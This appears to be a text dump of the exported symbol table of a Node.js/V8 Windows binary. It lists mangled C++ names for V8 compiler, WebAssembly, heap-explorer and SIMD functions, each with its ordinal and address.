                                                                                                                                                                                                                                    ?Epilogue@IncrementalMarking@internal@v8@@QEAAXXZ56560x140af6370
                                                                                                                                                                                                                                    ?Equal@Bignum@base@v8@@SA_NAEBV123@0@Z56570x140ffe2e0
                                                                                                                                                                                                                                    ?Equal@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z56580x1410c4440
                                                                                                                                                                                                                                    ?Equals@BitVector@internal@v8@@QEBA_NAEBV123@@Z56590x14053f180
                                                                                                                                                                                                                                    ?Equals@FieldType@internal@v8@@QEBA_NV123@@Z56600x1409a8420
                                                                                                                                                                                                                                    ?Equals@InstructionOperand@compiler@internal@v8@@QEBA_NAEBV1234@@Z56610x14057e3a0
                                                                                                                                                                                                                                    ?Equals@NodeProperties@compiler@internal@v8@@SA_NPEAVNode@234@0@Z56620x141034320
                                                                                                                                                                                                                                    ?Equals@Object@internal@v8@@SA?AV?$Maybe@_N@3@PEAVIsolate@23@V?$Handle@VObject@internal@v8@@@23@1@Z56630x14090cd70
                                                                                                                                                                                                                                    ?Equals@Operator@compiler@internal@v8@@UEBA_NPEBV1234@@Z56640x14057ec20
                                                                                                                                                                                                                                    ?Equals@Type@compiler@internal@v8@@QEBA_NV1234@@Z56650x14057ec30
                                                                                                                                                                                                                                    ?Equals@Value@v8@@QEBA?AV?$Maybe@_N@2@V?$Local@VContext@v8@@@2@V?$Local@VValue@v8@@@2@@Z56660x140c81820
                                                                                                                                                                                                                                    ?EqualsCanonicalized@InstructionOperand@compiler@internal@v8@@QEBA_NAEBV1234@@Z56670x14057ec80
                                                                                                                                                                                                                                    ?EqualsForTesting@SwissNameDictionary@internal@v8@@QEAA_NV123@@Z56680x1408d8c30
                                                                                                                                                                                                                                    ?EquivalentTime@DateCache@internal@v8@@QEAA_J_J@Z56690x1408181c0
                                                                                                                                                                                                                                    ?EquivalentTypes@wasm@internal@v8@@YA_NVValueType@123@0PEBUWasmModule@123@1@Z56700x140616cd0
                                                                                                                                                                                                                                    ?EquivalentYear@DateCache@internal@v8@@QEAAHH@Z56710x140818270
                                                                                                                                                                                                                                    ?ErrnoException@node@@YA?AV?$Local@VValue@v8@@@v8@@PEAVIsolate@3@HPEBD11@Z56720x14029beb0
                                                                                                                                                                                                                                    ?Error@AsyncStreamingDecoder@wasm@internal@v8@@AEAA?AV?$unique_ptr@VDecodingState@AsyncStreamingDecoder@wasm@internal@v8@@U?$default_delete@VDecodingState@AsyncStreamingDecoder@wasm@internal@v8@@@std@@@std@@AEBVWasmError@234@@Z56730x140668700
                                                                                                                                                                                                                                    ?Error@AsyncStreamingDecoder@wasm@internal@v8@@AEAA?AV?$unique_ptr@VDecodingState@AsyncStreamingDecoder@wasm@internal@v8@@U?$default_delete@VDecodingState@AsyncStreamingDecoder@wasm@internal@v8@@@std@@@std@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@6@@Z56740x140668760
                                                                                                                                                                                                                                    ?Error@Exception@v8@@SA?AV?$Local@VValue@v8@@@2@V?$Local@VString@v8@@@2@@Z56750x140c81980
                                                                                                                                                                                                                                    ?ErrorLevel@Message@v8@@QEBAHXZ56760x140c81ac0
                                                                                                                                                                                                                                    ?Error_string@Factory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ56770x14053f1d0
                                                                                                                                                                                                                                    ?Error_string@LocalFactory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ56780x1407dfb30
                                                                                                                                                                                                                                    ?Escape@EscapableHandleScope@v8@@AEAAPEA_KPEA_K@Z56790x140c81ad0
                                                                                                                                                                                                                                    ?EstimateLiftoffCodeSize@WasmCodeManager@wasm@internal@v8@@SA_KH@Z56800x140661450
                                                                                                                                                                                                                                    ?EstimateMarkingStepSize@GCIdleTimeHandler@internal@v8@@SA_KNN@Z56810x140b1e9b0
                                                                                                                                                                                                                                    ?EstimateNativeModuleCodeSize@WasmCodeManager@wasm@internal@v8@@SA_KHHH_NW4DynamicTiering@234@@Z56820x140661460
                                                                                                                                                                                                                                    ?EstimateNativeModuleCodeSize@WasmCodeManager@wasm@internal@v8@@SA_KPEBUWasmModule@234@_NW4DynamicTiering@234@@Z56830x1406614b0
                                                                                                                                                                                                                                    ?EstimateNativeModuleMetaDataSize@WasmCodeManager@wasm@internal@v8@@SA_KPEBUWasmModule@234@@Z56840x140661540
                                                                                                                                                                                                                                    ?EstimateObjectsCount@V8HeapExplorer@internal@v8@@QEAAIXZ56850x14086c020
                                                                                                                                                                                                                                    ?Eternalize@api_internal@v8@@YAPEAVValue@2@PEAVIsolate@2@PEAV32@@Z56860x140c81b90
                                                                                                                                                                                                                                    ?EvalError_string@Factory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ56870x14053f1e0
                                                                                                                                                                                                                                    ?EvalError_string@LocalFactory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ56880x1407dfb40
                                                                                                                                                                                                                                    ?Evaluate@Module@v8@@QEAA?AV?$MaybeLocal@VValue@v8@@@2@V?$Local@VContext@v8@@@2@@Z56890x140c81bf0
                                                                                                                                                                                                                                    ?EvaluateGlobal@debug@v8@@YA?AV?$MaybeLocal@VValue@v8@@@2@PEAVIsolate@2@V?$Local@VString@v8@@@2@W4EvaluateGlobalMode@12@_N@Z56900x140bc99e0
                                                                                                                                                                                                                                    ?EvaluateGlobalForTesting@debug@v8@@YA?AV?$MaybeLocal@VValue@v8@@@2@PEAVIsolate@2@V?$Local@VScript@v8@@@2@W4EvaluateGlobalMode@12@_N@Z56910x140bc9be0
                                                                                                                                                                                                                                    ?EventListener@ReasonEnum@Paused@API@Debugger@protocol@v8_inspector@@3PEBDEB56920x142298c90
                                                                                                                                                                                                                                    ?EvictDeoptimizedCode@OSROptimizedCodeCache@internal@v8@@QEAAXPEAVIsolate@23@@Z56930x1408f5100
                                                                                                                                                                                                                                    ?EvictFreeListItems@FreeList@internal@v8@@QEAA_KPEAVPage@23@@Z56940x140b1f3d0
                                                                                                                                                                                                                                    ?Exception@ReasonEnum@Paused@API@Debugger@protocol@v8_inspector@@3PEBDEB56950x142298c98
                                                                                                                                                                                                                                    ?Exception@TryCatch@v8@@QEBA?AV?$Local@VValue@v8@@@2@XZ56960x140c82090
                                                                                                                                                                                                                                    ?ExceptionHandler@TurboAssembler@internal@v8@@QEAAXXZ56970x1400971a0
                                                                                                                                                                                                                                    ?Exec@RegExp@internal@v8@@SA?AV?$MaybeHandle@VObject@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VJSRegExp@internal@v8@@@23@V?$Handle@VString@internal@v8@@@23@HV?$Handle@VRegExpMatchInfo@internal@v8@@@23@W4ExecQuirks@123@@Z56980x14082a760
                                                                                                                                                                                                                                    ?Exec@RegExp@v8@@QEAA?AV?$MaybeLocal@VObject@v8@@@2@V?$Local@VContext@v8@@@2@V?$Local@VString@v8@@@2@@Z56990x140c82140
                                                                                                                                                                                                                                    ?Execute@JSToWasmWrapperCompilationUnit@wasm@internal@v8@@QEAAXXZ57000x1406bc5b0
                                                                                                                                                                                                                                    ?ExecuteCompilation@WasmCompilationUnit@wasm@internal@v8@@QEAA?AUWasmCompilationResult@234@PEAUCompilationEnv@234@PEBVWireBytesStorage@234@PEAVCounters@34@PEAVWasmFeatures@234@@Z57010x1406bc780
                                                                                                                                                                                                                                    ?ExecuteCustomCallbacks@OldToNewRememberedSet@internal@cppgc@@QEAAXVLivenessBroker@3@@Z57020x14050a5d0
                                                                                                                                                                                                                                    ?ExecuteForTesting@NativeRegExpMacroAssembler@internal@v8@@SAHVString@23@HPEBE1PEAHHPEAVIsolate@23@VJSRegExp@23@@Z57030x140839ce0
                                                                                                                                                                                                                                    ?ExecuteFunctionCompilation@WasmCompilationUnit@wasm@internal@v8@@AEAA?AUWasmCompilationResult@234@PEAUCompilationEnv@234@PEBVWireBytesStorage@234@PEAVCounters@34@PEAVWasmFeatures@234@@Z57040x1406bc930
                                                                                                                                                                                                                                    ?ExecuteImportWrapperCompilation@WasmCompilationUnit@wasm@internal@v8@@AEAA?AUWasmCompilationResult@234@PEAUCompilationEnv@234@@Z57050x1406bcf00
                                                                                                                                                                                                                                    ?ExecuteJob@OptimizedCompilationJob@internal@v8@@QEAA?AW4Status@CompilationJob@23@PEAVRuntimeCallStats@23@PEAVLocalIsolate@23@@Z57060x140c040d0
                                                                                                                                                                                                                                    ?ExecuteLiftoffCompilation@wasm@internal@v8@@YA?AUWasmCompilationResult@123@PEAUCompilationEnv@123@AEBUFunctionBody@123@HW4ForDebugging@123@AEBULiftoffOptions@123@@Z57070x1406febf0
                                                                                                                                                                                                                                    ?ExecutePreFinalizers@HeapBase@internal@cppgc@@IEAA_KXZ57080x14051b420
                                                                                                                                                                                                                                    ?Exit@Context@v8@@QEAAXXZ57090x140c82480
                                                                                                                                                                                                                                    ?Exit@Isolate@internal@v8@@QEAAXXZ57100x140b69bc0
                                                                                                                                                                                                                                    ?Exit@Isolate@v8@@QEAAXXZ57110x140c82570
                                                                                                                                                                                                                                    ?ExitProcess@OS@base@v8@@SAXH@Z57120x140ff3ca0
                                                                                                                                                                                                                                    ?Expand@CompactionSpace@internal@v8@@MEAAPEAVPage@23@XZ57130x140aac9b0
                                                                                                                                                                                                                                    ?Expand@PagedSpace@internal@v8@@MEAAPEAVPage@23@XZ57140x140aaca00
                                                                                                                                                                                                                                    ?ExpandBackground@PagedSpace@internal@v8@@IEAA?AV?$Optional@U?$pair@_K_K@std@@@base@3@_K@Z57150x140aacaf0
                                                                                                                                                                                                                                    ?ExpandBuffer@RegExpBytecodeGenerator@internal@v8@@AEAAXXZ57160x140854fa0
                                                                                                                                                                                                                                    ?ExpandInternals@BitsetType@compiler@internal@v8@@SA_K_K@Z57170x141027840
                                                                                                                                                                                                                                    ?Expect@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAAXW4Value@Token@23@@Z57180x14088e9b0
                                                                                                                                                                                                                                    ?ExpectContextualKeyword@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAAXPEBVAstRawString@23@PEBDH@Z57190x14088e9f0
                                                                                                                                                                                                                                    ?ExpectSemicolon@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAAXXZ57200x14088eae0
                                                                                                                                                                                                                                    ?ExpectedTransitionKey@TransitionsAccessor@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ57210x14053f1f0
                                                                                                                                                                                                                                    ?ExpectedTransitionTarget@TransitionsAccessor@internal@v8@@QEAA?AV?$Handle@VMap@internal@v8@@@23@XZ57220x14053f340
                                                                                                                                                                                                                                    ?ExperimentalOneshotExec@RegExp@internal@v8@@SA?AV?$MaybeHandle@VObject@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VJSRegExp@internal@v8@@@23@V?$Handle@VString@internal@v8@@@23@HV?$Handle@VRegExpMatchInfo@internal@v8@@@23@W4ExecQuirks@123@@Z57230x14082a8f0
                                                                                                                                                                                                                                    ?ExplicitScopeForTesting@EmbedderStackStateScope@internal@v8@@SA?AV123@PEAVLocalEmbedderHeapTracer@23@W4EmbedderStackState@cppgc@@@Z57240x140b043f0
                                                                                                                                                                                                                                    ?Exponentiate@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z57250x1410c4940
                                                                                                                                                                                                                                    ?ExportForOptimization@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVGraph@234@XZ57260x141218e70
                                                                                                                                                                                                                                    ?ExportForTest@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVSchedule@234@XZ57270x141219070
                                                                                                                                                                                                                                    ?ExportImportedFunction@WasmModuleBuilder@wasm@internal@v8@@QEAAXV?$Vector@$$CBD@base@4@H@Z57280x140634e40
                                                                                                                                                                                                                                    ?ExportNativeModule@WasmEngine@wasm@internal@v8@@QEAA?AV?$shared_ptr@VNativeModule@wasm@internal@v8@@@std@@V?$Handle@VWasmModuleObject@internal@v8@@@34@@Z57290x14064ca60
                                                                                                                                                                                                                                    ?ExpressionFromIdentifier@Parser@internal@v8@@AEAAPEAVVariableProxy@23@PEBVAstRawString@23@HW4InferName@23@@Z57300x14088eba0
                                                                                                                                                                                                                                    ?ExpressionFromLiteral@Parser@internal@v8@@AEAAPEAVExpression@23@W4Value@Token@23@H@Z57310x1408be690
                                                                                                                                                                                                                                    ?ExpressionFromPrivateName@Parser@internal@v8@@AEAAPEAVVariableProxy@23@PEAVPrivateNameScopeIterator@23@PEBVAstRawString@23@H@Z57320x14088ebf0
                                                                                                                                                                                                                                    ?ExpressionListToExpression@Parser@internal@v8@@AEAAPEAVExpression@23@AEBV?$ScopedList@PEAVExpression@internal@v8@@PEAX@23@@Z57330x1408be860
                                                                                                                                                                                                                                    ?Extend@HandleScope@internal@v8@@CAPEA_KPEAVIsolate@23@@Z57340x140b4b180
                                                                                                                                                                                                                                    ?Extend@ScriptContextTable@internal@v8@@SA?AV?$Handle@VScriptContextTable@internal@v8@@@23@PEAVIsolate@23@V423@V?$Handle@VContext@internal@v8@@@23@_N@Z57350x1409f5150
                                                                                                                                                                                                                                    ?ExtendTheAfterSegment@DateCache@internal@v8@@AEAAXHH@Z57360x140bd6390
                                                                                                                                                                                                                                    ?ExtendingNonExtensible@LookupIterator@internal@v8@@QEAA_NV?$Handle@VJSReceiver@internal@v8@@@23@@Z57370x14053f3f0
                                                                                                                                                                                                                                    ?Extern@AsmType@wasm@internal@v8@@SAPEAV1234@XZ57380x14072f980
                                                                                                                                                                                                                                    ?ExternalAssemblerBuffer@internal@v8@@YA?AV?$unique_ptr@VAssemblerBuffer@internal@v8@@U?$default_delete@VAssemblerBuffer@internal@v8@@@std@@@std@@PEAXH@Z57390x140c0f1a0
                                                                                                                                                                                                                                    ?ExternalBackingStoreBytes@NewSpace@internal@v8@@QEBA_KXZ57400x14053f430
                                                                                                                                                                                                                                    ?ExternalBackingStoreBytes@NewSpace@internal@v8@@UEBA_KW4ExternalBackingStoreType@23@@Z57410x14053f490
                                                                                                                                                                                                                                    ?ExternalBackingStoreBytes@Space@internal@v8@@UEBA_KW4ExternalBackingStoreType@23@@Z57420x14053f4b0
                                                                                                                                                                                                                                    ?ExternalConstant@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@VExternalReference@internal@v8@@@34@VExternalReference@34@@Z57430x1410a8c70
                                                                                                                                                                                                                                    ?ExternalConstant@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBVExternalReference@34@@Z57440x14103a570
                                                                                                                                                                                                                                    ?ExternalConstant@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@VExternalReference@34@@Z57450x1410e2560
                                                                                                                                                                                                                                    ?ExternalConstant@MachineGraph@compiler@internal@v8@@QEAAPEAVNode@234@VExternalReference@34@@Z57460x1410de2e0
                                                                                                                                                                                                                                    ?ExternalConstant@MachineGraph@compiler@internal@v8@@QEAAPEAVNode@234@W4FunctionId@Runtime@34@@Z57470x1410de350
                                                                                                                                                                                                                                    ?ExternalConstant@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@VExternalReference@34@@Z57480x1410a8cc0
                                                                                                                                                                                                                                    ?ExternalPointer@Type@compiler@internal@v8@@SA?AV1234@XZ57490x14057ed30
                                                                                                                                                                                                                                    ?ExternalReferenceAsOperand@?$SharedTurboAssemblerBase@VTurboAssembler@internal@v8@@@internal@v8@@AEAA?AVOperand@23@VExternalReference@23@VRegister@23@@Z57500x1405efec0
                                                                                                                                                                                                                                    ?ExternalReferenceAsOperand@TurboAssembler@internal@v8@@QEAA?AVOperand@23@VExternalReference@23@VRegister@23@@Z57510x1405f7aa0
                                                                                                                                                                                                                                    ?ExtractAccessorInfoReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VAccessorInfo@23@@Z57520x14086c090
                                                                                                                                                                                                                                    ?ExtractAccessorPairProperty@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VName@23@VObject@23@H@Z57530x14086c350
                                                                                                                                                                                                                                    ?ExtractAccessorPairReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VAccessorPair@23@@Z57540x14086c450
                                                                                                                                                                                                                                    ?ExtractAllocationSiteReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VAllocationSite@23@@Z57550x14086c620
                                                                                                                                                                                                                                    ?ExtractArrayBoilerplateDescriptionReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VArrayBoilerplateDescription@23@@Z57560x14086c790
                                                                                                                                                                                                                                    ?ExtractBytecodeArrayReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VBytecodeArray@23@@Z57570x14086c840
                                                                                                                                                                                                                                    ?ExtractCellReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VCell@23@@Z57580x14086c900
                                                                                                                                                                                                                                    ?ExtractCodeReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VCode@23@@Z57590x14086c9f0
                                                                                                                                                                                                                                    ?ExtractContextReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VContext@23@@Z57600x14086cd60
                                                                                                                                                                                                                                    ?ExtractDescriptorArrayReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VDescriptorArray@23@@Z57610x14086d1d0
                                                                                                                                                                                                                                    ?ExtractElementReferences@V8HeapExplorer@internal@v8@@AEAAXVJSObject@23@PEAVHeapEntry@23@@Z57620x14086d320
                                                                                                                                                                                                                                    ?ExtractEphemeronHashTableReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VEphemeronHashTable@23@@Z57630x14086d540
                                                                                                                                                                                                                                    ?ExtractFeedbackCellReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VFeedbackCell@23@@Z57640x14086d9c0
                                                                                                                                                                                                                                    ?ExtractFeedbackVectorReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VFeedbackVector@23@@Z57650x14086da70
                                                                                                                                                                                                                                    ?ExtractFixedArrayReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VFixedArray@23@@Z57660x14086db90
                                                                                                                                                                                                                                    ?ExtractInternalReferences@V8HeapExplorer@internal@v8@@AEAAXVJSObject@23@PEAVHeapEntry@23@@Z57670x14086dc10
                                                                                                                                                                                                                                    ?ExtractJSArrayBufferReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VJSArrayBuffer@23@@Z57680x14086dd20
                                                                                                                                                                                                                                    ?ExtractJSCollectionReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VJSCollection@23@@Z57690x14086ddf0
                                                                                                                                                                                                                                    ?ExtractJSGeneratorObjectReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VJSGeneratorObject@23@@Z57700x14086dee0
                                                                                                                                                                                                                                    ?ExtractJSGlobalProxyReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VJSGlobalProxy@23@@Z57710x14086e0e0
                                                                                                                                                                                                                                    ?ExtractJSObjectReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VJSObject@23@@Z57720x14086e1d0
                                                                                                                                                                                                                                    ?ExtractJSPromiseReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VJSPromise@23@@Z57730x14086e860
                                                                                                                                                                                                                                    ?ExtractJSWeakCollectionReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VJSWeakCollection@23@@Z57740x14086ddf0
                                                                                                                                                                                                                                    ?ExtractJSWeakRefReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VJSWeakRef@23@@Z57750x14086e950
                                                                                                                                                                                                                                    ?ExtractLocation@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VHeapObject@23@@Z57760x14086e9d0
                                                                                                                                                                                                                                    ?ExtractLocationForJSFunction@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VJSFunction@23@@Z57770x14086ea70
                                                                                                                                                                                                                                    ?ExtractMapReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VMap@23@@Z57780x14086ebc0
                                                                                                                                                                                                                                    ?ExtractMaps@FeedbackNexus@internal@v8@@QEBAHPEAV?$vector@V?$Handle@VMap@internal@v8@@@internal@v8@@V?$allocator@V?$Handle@VMap@internal@v8@@@internal@v8@@@std@@@std@@@Z57790x1409aa8f0
                                                                                                                                                                                                                                    ?ExtractMapsAndFeedback@FeedbackNexus@internal@v8@@QEBAHPEAV?$vector@U?$pair@V?$Handle@VMap@internal@v8@@@internal@v8@@VMaybeObjectHandle@23@@std@@V?$allocator@U?$pair@V?$Handle@VMap@internal@v8@@@internal@v8@@VMaybeObjectHandle@23@@std@@@2@@std@@@Z57800x1409aa980
                                                                                                                                                                                                                                    ?ExtractMapsAndHandlers@FeedbackNexus@internal@v8@@QEBAHPEAV?$vector@U?$pair@V?$Handle@VMap@internal@v8@@@internal@v8@@VMaybeObjectHandle@23@@std@@V?$allocator@U?$pair@V?$Handle@VMap@internal@v8@@@internal@v8@@VMaybeObjectHandle@23@@std@@@2@@std@@V?$function@$$A6A?AV?$MaybeHandle@VMap@internal@v8@@@internal@v8@@V?$Handle@VMap@internal@v8@@@23@@Z@5@@Z57810x1409aaa60
                                                                                                                                                                                                                                    ?ExtractNumberReference@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VObject@23@@Z57820x14086f0f0
                                                                                                                                                                                                                                    ?ExtractPropertyCellReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VPropertyCell@23@@Z57830x14086f1d0
                                                                                                                                                                                                                                    ?ExtractPropertyReferences@V8HeapExplorer@internal@v8@@AEAAXVJSObject@23@PEAVHeapEntry@23@@Z57840x14086f2e0
                                                                                                                                                                                                                                    ?ExtractReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VHeapObject@23@@Z57850x14086f800
                                                                                                                                                                                                                                    ?ExtractRegExpBoilerplateDescriptionReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VRegExpBoilerplateDescription@23@@Z57860x14086fe80
                                                                                                                                                                                                                                    ?ExtractScopeInfoReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VScopeInfo@23@@Z57870x14086fed0
                                                                                                                                                                                                                                    ?ExtractScriptBuffer@WebSnapshotDeserializer@internal@v8@@AEAA?AV?$Vector@$$CBE@base@3@PEAVIsolate@23@V?$Handle@VScript@internal@v8@@@23@@Z57880x1407b4e10
                                                                                                                                                                                                                                    ?ExtractScriptReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VScript@23@@Z57890x14086ff30
                                                                                                                                                                                                                                    ?ExtractSharedFunctionInfoReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VSharedFunctionInfo@23@@Z57900x140870270
                                                                                                                                                                                                                                    ?ExtractStringReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VString@23@@Z57910x1408704f0
                                                                                                                                                                                                                                    ?ExtractSymbolReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VSymbol@23@@Z57920x1408706d0
                                                                                                                                                                                                                                    ?ExtractWeakCellReferences@V8HeapExplorer@internal@v8@@AEAAXPEAVHeapEntry@23@VWeakCell@23@@Z57930x140870750
                                                                                                                                                                                                                                    ?ExtractWrappableInfo@LocalEmbedderHeapTracer@internal@v8@@SA_NPEAVIsolate@23@AEBUWrapperDescriptor@3@AEBVEmbedderDataSlot@23@2PEAU?$pair@PEAXPEAX@std@@@Z57940x140a98910
                                                                                                                                                                                                                                    ?ExtractWrappableInfo@LocalEmbedderHeapTracer@internal@v8@@SA_NPEAVIsolate@23@VJSObject@23@AEBUWrapperDescriptor@3@PEAU?$pair@PEAXPEAX@std@@@Z57950x140a98960
                                                                                                                                                                                                                                    ?ExtractWrapper@Local@MarkingWorklists@internal@v8@@QEAA_NVMap@34@VJSObject@34@AEAU?$pair@_K_K@std@@@Z57960x140a98a70
                                                                                                                                                                                                                                    ?ExtractWrapperInfo@LocalEmbedderHeapTracer@internal@v8@@QEAA?AU?$pair@PEAXPEAX@std@@PEAVIsolate@23@VJSObject@23@@Z57970x140b3aa80
                                                                                                                                                                                                                                    ?F32x4Abs@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ57980x141051aa0
                                                                                                                                                                                                                                    ?F32x4Add@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ57990x141051ab0
                                                                                                                                                                                                                                    ?F32x4Ceil@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ58000x141051ac0
                                                                                                                                                                                                                                    ?F32x4DemoteF64x2Zero@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ58010x141051ad0
                                                                                                                                                                                                                                    ?F32x4Div@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ58020x141051ae0
                                                                                                                                                                                                                                    ?F32x4Eq@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ58030x141051af0
                                                                                                                                                                                                                                    ?F32x4ExtractLane@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@H@Z58040x141051b00
                                                                                                                                                                                                                                    ?F32x4ExtractLane@SharedTurboAssembler@internal@v8@@QEAAXVXMMRegister@23@0E@Z58050x1406118b0
                                                                                                                                                                                                                                    ?F32x4Floor@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ58060x141051ba0
                                                                                                                                                                                                                                    ?F32x4Le@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ58070x141051bb0
                                                                                                                                                                                                                                    ?F32x4Lt@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ58080x141051bc0
                                                                                                                                                                                                                                    ?F32x4Max@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ58090x141051bd0
                                                                                                                                                                                                                                    ?F32x4Max@SharedTurboAssembler@internal@v8@@QEAAXVXMMRegister@23@000@Z58100x140611990
                                                                                                                                                                                                                                    ?F32x4Min@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ58110x141051be0
                                                                                                                                                                                                                                    ?F32x4Min@SharedTurboAssembler@internal@v8@@QEAAXVXMMRegister@23@000@Z58120x140611be0
                                                                                                                                                                                                                                    ?F32x4Mul@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ58130x141051bf0
                                                                                                                                                                                                                                    ?F32x4Ne@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ58140x141051c00
                                                                                                                                                                                                                                    ?F32x4NearestInt@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ58150x141051c10
                                                                                                                                                                                                                                    ?F32x4Neg@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ58160x141051c20
                                                                                                                                                                                                                                    ?F32x4Pmax@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ58170x141051c30
                                                                                                                                                                                                                                    ?F32x4Pmin@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ58180x141051c40
                                                                                                                                                                                                                                    ?F32x4Qfma@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ58190x141051c50
                                                                                                                                                                                                                                    ?F32x4Qfma@SharedTurboAssembler@internal@v8@@QEAAXVXMMRegister@23@0000@Z58200x140611e00
                                                                                                                                                                                                                                    ?F32x4Qfms@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ58210x141051c60
                                                                                                                                                                                                                                    ?F32x4Qfms@SharedTurboAssembler@internal@v8@@QEAAXVXMMRegister@23@0000@Z58220x140612030
                                                                                                                                                                                                                                    ?F32x4RecipApprox@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ58230x141051c70
                                                                                                                                                                                                                                    ?F32x4RecipSqrtApprox@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ58240x141051c80
                                                                                                                                                                                                                                    ?F32x4RelaxedMax@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ58250x141051c90
                                                                                                                                                                                                                                    ?F32x4RelaxedMin@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ58260x141051ca0
                                                                                                                                                                                                                                    ?F32x4ReplaceLane@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@H@Z58270x141051cb0
                                                                                                                                                                                                                                    ?F32x4SConvertI32x4@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ58280x141051d50
                                                                                                                                                                                                                                    ?F32x4Splat@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ58290x141051d60
                                                                                                                                                                                                                                    ?F32x4Splat@SharedTurboAssembler@internal@v8@@QEAAXVXMMRegister@23@0@Z58300x1406121f0
                                                                                                                                                                                                                                    ?F32x4Sqrt@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ58310x141051d70
                                                                                                                                                                                                                                    ?F32x4Sub@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ58320x141051d80
